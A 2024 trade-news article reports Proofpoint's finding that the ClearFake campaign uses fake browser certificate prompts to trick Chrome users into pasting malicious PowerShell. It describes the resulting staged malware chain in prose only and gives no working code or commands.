Proofpoint uncovers social engineering technique

Proofpoint Inc.

By Dylan Bushell-Embling
Monday, 24 June, 2024

Proofpoint uncovers social engineering technique

Proofpoint has uncovered a new social engineering technique attempting to coerce victims into copy and pasting malicious PowerShell scripts to infect their computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.

The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check against virtual environments and sandboxes, and if none are found downloads a fourth PowerShell script that downloads a file named, extracts the content to find any .exe files.

This method was then used to download payloads including cryptocurrency minors, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”

Top image credit:

Related News

BlueVoyant launches security ops platform

BlueVoyant's Cyber Defence Platform leverages AI to enable security operations that span an...

CrowdStrike launches next-gen MDR solution

The Crowdstrike Falcon Next-Gen MDR solution expands MDR operations beyond native endpoint,...

Cysurance to offer cyber insurance to Sophos customers

Australian Sophos customers will be able to take advantage of discounted cyber insurance provided...

  • All content Copyright © 2024 Westwick-Farrow Pty Ltd